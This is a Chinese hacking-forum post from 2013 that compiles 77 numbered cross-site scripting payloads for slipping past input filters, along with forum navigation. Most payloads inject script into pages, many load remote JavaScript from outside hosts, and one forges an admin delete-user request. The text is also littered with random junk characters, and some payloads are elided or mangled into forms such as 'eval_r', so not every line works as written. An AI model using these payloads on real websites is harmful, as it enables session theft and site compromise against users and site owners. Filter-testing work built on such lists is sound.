找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2868|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" M/ v0 w8 z, j) U  w  R
(1)普通的XSS JavaScript注入
7 p3 q5 ^/ ^- q0 i, E" Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( P) H, N, G' q  y3 y) r: f$ X( J
(2)IMG标签XSS使用JavaScript命令# P' S8 @( B" j2 o0 @  I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; B2 O: n  S8 P0 Z& T(3)IMG标签无分号无引号
; J# B* N/ V+ }( j& f( e<IMG SRC=javascript:alert(‘XSS’)>
9 x# j! l8 s  u8 C% _+ G. w(4)IMG标签大小写不敏感8 K' A8 C% ]' |8 i9 c9 V8 |$ @3 X2 O. ^1 Z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! R+ Q& H: k9 Y+ H& i0 F(5)HTML编码(必须有分号)# l, q# L% L  n. M1 F
<IMG SRC=javascript:alert(“XSS”)>+ c, R  y$ J% N$ A& ^/ q. z
(6)修正缺陷IMG标签! `; b) V2 q- n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- }  W$ q+ i7 N( y' J" S
; ~/ j3 M% f" s" f

) F- W+ i. ^! i6 e% b3 N" w(7)formCharCode标签(计算器)! Z( n: r3 }, ?$ ]. m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
8 ~  r) n/ g' A. C. s  x/ x: h(8)UTF-8的Unicode编码(计算器)" J( h: P2 v  \
<IMG SRC=jav..省略..S')>
6 B% z) @! h6 I, g. P(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 l% T# N3 x8 x* B5 o2 J  O( I<IMG SRC=jav..省略..S')>$ u5 Y; S( D* x2 K* J+ o; |/ y0 K4 P
(10)十六进制编码也是没有分号(计算器)4 f6 m; `& l+ |
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
3 G# o, s( i7 [2 M(11)嵌入式标签,将Javascript分开
+ Z2 V( [$ ~0 |4 h<IMG SRC=”jav ascript:alert(‘XSS’);”>0 n$ H! R- n/ \& V( T
(12)嵌入式编码标签,将Javascript分开
" [) d' n3 W+ ]4 l<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 D4 |  J# d% N& ?$ i, d( {(13)嵌入式换行符
) k9 @# d  ?0 a* o<IMG SRC=”jav ascript:alert(‘XSS’);”>
; y2 v/ v* ?$ S# J8 v- H(14)嵌入式回车3 J" N" P, D+ o7 E
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- |% g! |( k, [% E. Q' D& E; s(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 `' d& w4 @7 C  U$ d' P7 G<IMG SRC=”javascript:alert(‘XSS‘)”>
! W/ I, l$ J  c( ^4 c; a1 T1 e8 v(16)解决限制字符(要求同页面)+ Z" @) E: s1 K* O
<script>z=’document.’</script>6 H6 w; B' I4 g2 B4 r. Q
<script>z=z+’write(“‘</script>
* W* x! z% H6 v<script>z=z+’<script’</script>6 c# `  y. L4 {6 s
<script>z=z+’ src=ht’</script>9 }* L( M% W, d3 c4 V% V
<script>z=z+’tp://ww’</script>; z& C5 B5 q& z8 i2 Z  P
<script>z=z+’w.shell’</script>7 \4 ~' A8 Z* |. }! `7 n
<script>z=z+’.net/1.’</script>
" Q7 g% d1 J" o4 G; N# b<script>z=z+’js></sc’</script>' f8 d) ?7 P: G1 c
<script>z=z+’ript>”)’</script>$ {" t) d6 w$ r( H+ ?/ y- S2 i& \
<script>eval_r(z)</script>
9 W, q. m0 U& {, E(17)空字符12-7-1 T00LS - Powered by Discuz! Board
5 D9 b* v* S, \) c  mhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6  x" \$ c+ I) |: T* ~, E% X
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" _; x" o: M8 W- Z( r: k9 I& j& f(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用/ y% e3 v! a7 a9 }
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* }. B, P# _2 H# e6 H
(19)Spaces和meta前的IMG标签  e! m2 e4 u! d6 y8 p  Q" H
<IMG SRC=” javascript:alert(‘XSS’);”>
1 h: L/ ^1 U* G& [0 J(20)Non-alpha-non-digit XSS! @7 e$ Q+ F$ o* Z& A
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 B1 z0 u# L0 Z+ X; }
(21)Non-alpha-non-digit XSS to 2
+ l; O- ]& C" O5 d<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
9 {3 O$ w! ~& X) \4 Y7 [(22)Non-alpha-non-digit XSS to 3
  A' S5 k" {/ H" l) h<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ C1 A4 k4 M3 A6 c' u0 j2 C(23)双开括号" G$ u7 I( [* M2 d8 s7 \( P
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ ~4 u, S; b) d5 k(24)无结束脚本标记(仅火狐等浏览器)& k- L4 U  Y$ j# O5 I- A' [  x7 |: ?
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>* T6 a: N5 [! Q$ b1 p9 k! k
(25)无结束脚本标记2
) u, o) e7 g) A% Q& @<SCRIPT SRC=//3w.org/XSS/xss.js>
0 T5 a2 q: C% J9 \(26)半开的HTML/JavaScript XSS
$ n% ~( f( U/ f# M# i* E<IMG SRC=”javascript:alert(‘XSS’)”% Z+ ?; w; C- r+ l/ H& x
(27)双开角括号
% _: g! Z  g& w( ]- O3 P$ g<iframe src=http://3w.org/XSS.html <
' ~6 `, q! Z" h0 k(28)无单引号 双引号 分号; X4 R) {# d8 F* d, u- _
<SCRIPT>a=/XSS/
) V5 \% }$ a2 f- t; @: a8 y4 jalert(a.source)</SCRIPT>' g: B+ Y: v' g. `
(29)换码过滤的JavaScript3 ]0 z. ^8 \/ Z8 Y$ G/ p2 H; b& J
\”;alert(‘XSS’);//
- i' a( {: T+ o) L1 R+ q(30)结束Title标签5 `( \/ B7 G4 [, ?8 P# B& j
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>0 {. W0 r$ _8 A5 j4 a' r
(31)Input Image4 ~, O( W+ z8 _, v
<INPUT SRC=”javascript:alert(‘XSS’);”>' ^1 i. l3 A& @6 k3 _' ]+ Z
(32)BODY Image4 d+ \4 ^* N! c: r' `0 U" [# y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# c& G' `- K. d(33)BODY标签
# S; n: M" f' m8 X<BODY(‘XSS’)>
& _" b* ^; D, ?* s$ n" X(34)IMG Dynsrc
* Y2 O& Y- R* [/ c" O7 l<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 p* v* _" r1 o) i. R; g# G" N(35)IMG Lowsrc
) L# a3 p) d* E9 J<IMG LOWSRC=”javascript:alert(‘XSS’)”>9 f1 a) o4 S; u& }. k0 ]
(36)BGSOUND
8 S0 u' h/ h' b$ S' a1 m<BGSOUND SRC=”javascript:alert(‘XSS’);”>- A: c1 ^7 V9 J. d! Y2 c% D, e
(37)STYLE sheet1 b% y2 A! N- X5 |* i/ `) |; c
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>  i% a0 ?! Q& U. F
(38)远程样式表
/ R' p2 h3 L& }- u9 K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 h, r$ q- [1 U/ V. z* o' y
(39)List-style-image(列表式)7 m- e* w9 Y3 U* Q% D7 `5 a
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, _- ~6 U  r6 r% ~
(40)IMG VBscript
1 v( ~4 @8 q9 r! n4 M0 c<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS4 r& h9 [+ O7 m
(41)META链接url% B( g  s1 X) b) [. O$ k) p3 e
1 J3 }: \5 L2 Z$ ]5 S$ [' t/ g/ ]

* _- T/ \6 Q& c+ d# s# n<META HTTP-EQUIV=”refresh” CONTENT=”0;
0 \! H" T  ?5 D* M9 ~URL=http://;URL=javascript:alert(‘XSS’);”>
9 j$ [7 s% x& o4 y, g" u- m' k8 M(42)Iframe/ N/ L9 ~) P8 O+ r/ B4 M! l
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: c5 |$ H5 M& Y3 g0 j(43)Frame
8 P; Q1 V/ m# K! n<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
% A: s) l& k' }% k2 o# {https://www.t00ls.net/viewthread ... table&tid=15267 3/6, q4 `2 m4 i4 t! }# Y. {
(44)Table
3 y. W8 h' B1 o<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* y9 [) d( c( U/ o* g
(45)TD8 \$ Z8 H& ~- ~/ n6 @
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 e. |! H( ~0 ~6 u! ?& R$ J
(46)DIV background-image
1 s: t: B8 \2 l# S<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( c* j( D% ?9 n) ~' s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-, g2 P9 g5 f' Q$ ~- f+ W  n
8&13&12288&65279)
& Y1 J( r' h/ ?6 i. B<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. {/ Q3 Q. L' g' l7 \(48)DIV expression. q3 q6 a+ i( e  |6 E: B
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 ?0 ~( T5 P- I" ^6 z(49)STYLE属性分拆表达
' U5 e% p- ]0 a* w; Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>  L& l7 f  L+ c+ i
(50)匿名STYLE(组成:开角号和一个字母开头)7 ]  E( W" u1 r2 c
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>5 \7 S7 {9 R  s/ z* j; d/ r
(51)STYLE background-image
% A+ _3 b+ K$ Y+ f<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A/ z3 `; A* y# ^5 b  k( p- _
CLASS=XSS></A>6 P) E5 r5 _+ w; T
(52)IMG STYLE方式9 H3 [1 w7 K$ F5 [& @
exppression(alert(“XSS”))’>" w* F4 S$ ]5 p
(53)STYLE background
4 d6 n* y2 j6 Z1 D<STYLE><STYLE2 {/ j9 Q2 a3 U& c' o! H
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>- y3 A' _0 C( H1 }
(54)BASE" K  {/ e8 E9 C% H& }9 B/ h! l' W
<BASE HREF=”javascript:alert(‘XSS’);//”>7 m% @2 {; R/ I
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS* a  \/ N) U; q7 `0 T2 z- G5 r* A
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: l2 J2 ^8 B5 o/ i, Z( }, a6 S& H
(56)在flash中使用ActionScrpt可以混进你XSS的代码3 t% v! Q2 M4 l2 j
a=”get”;5 f! _& [) M6 v2 V% b: h, y2 e& [! S
b=”URL(\”";
2 d# d( p0 ?" S& x0 Zc=”javascript:”;) \& q0 ]; x' O3 N
d=”alert(‘XSS’);\”)”;
7 W3 s. j( d5 x# Aeval_r(a+b+c+d);
3 W9 b0 s7 E7 R2 j' G& T9 w# `(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
* H  x* p$ Q) m0 P<HTML xmlns:xss>6 \8 H# `! W* ]& Q+ s+ Z) C
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- c" Q0 \1 i1 }4 u( `$ S  ?+ v6 ?
<xss:xss>XSS</xss:xss>
& \9 q! [5 t4 Y+ e( v0 z# y$ [</HTML>6 g3 U# d  J) O# l* e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 v2 E4 t: m' ^2 g+ q+ I9 T# |
<SCRIPT SRC=””></SCRIPT># U( V4 V" P9 ]& H1 C1 R2 z8 i: G
(59)IMG嵌入式命令,可执行任意命令
, b+ G) [- n- m<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ T6 t9 k  S5 d1 p! t(60)IMG嵌入式命令(a.jpg在同服务器)0 l$ U+ _7 F0 G5 l  Q9 D* i* D
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
% w* h" Q5 Z  Z. R(61)绕符号过滤( l/ `0 R& `' [( H. q% R$ s
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; h# L( G) f: k4 i+ o
(62)
4 U* e0 H% v/ c: V4 L  h, p# E1 F! k<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 f: p: Q& X" L$ k" B(63)
3 P; Q- C1 i2 t9 q2 J! j% R<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>0 R% G0 c& w8 M+ |! ~6 x
(64)' C5 `7 n. e1 {' x0 N2 K' A. ]8 x
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
  o* ~- q; n2 L7 z( E(65)0 n3 m0 S/ m# x0 i/ z5 W
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ q' G2 ^0 R  F) p6 x
(66)12-7-1 T00LS - Powered by Discuz! Board
. d% y0 f) j* E% Ihttps://www.t00ls.net/viewthread ... table&tid=15267 4/6" c/ h! S1 `) n; i
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
; t2 e  ^8 G; C+ v7 k(67). o$ T, X1 I$ t+ Q1 U8 {( l5 [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>; P) }! c) r1 [
</SCRIPT>
$ Z" l4 a. F7 ]: e5 t! L# }(68)URL绕行
$ V! a2 g7 k/ B<A HREF=”http://127.0.0.1/”>XSS</A>
8 M7 E2 B  G) M8 l(69)URL编码& K" v  e1 o( H5 ?
<A HREF=”http://3w.org”>XSS</A>
8 y: T) n. ^* m; R(70)IP十进制& Q  Q5 G. V# E
<A HREF=”http://3232235521″>XSS</A>; ^; Q  e4 j5 o: N! s
(71)IP十六进制, D5 T' X5 `' P9 a" c) q; P
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! [/ V( O/ ?' m$ [2 @8 [8 |* m
(72)IP八进制
; p, ^8 R! @8 {<A HREF=”http://0300.0250.0000.0001″>XSS</A>
, J5 g& e+ \7 _' |: w(73)混合编码: G) H8 J/ A. r) k+ L( I
<A HREF=”h
# q  E- a* y4 `+ B! `tt p://6 6.000146.0×7.147/”">XSS</A>' N- `2 @" ]8 [" ~
(74)节省[http:]' O# K4 `. m8 S+ L9 T( f4 Y
<A HREF=”//www.google.com/”>XSS</A>
" |: p- i  t9 c' ]  z; e5 s(75)节省[www]
, H) {- j. g: t, `8 \( T1 m0 V<A HREF=”http://google.com/”>XSS</A>
1 S" J2 L5 Q, |; H(76)绝对点绝对DNS
2 a3 q* {- ]8 W" S. O$ C<A HREF=”http://www.google.com./”>XSS</A>
' u7 p$ d/ [) V$ {(77)javascript链接
0 C; I' ]8 H+ U4 T2 g<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>3 v7 d' V( S2 z0 w9 G1 w
1 x/ b$ n$ S+ R" n
原文地址:http://fuzzexp.org/u/0day/?p=142 w4 p( l/ _' D. o  [! }
9 [+ i- M' [; [1 F- ?2 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表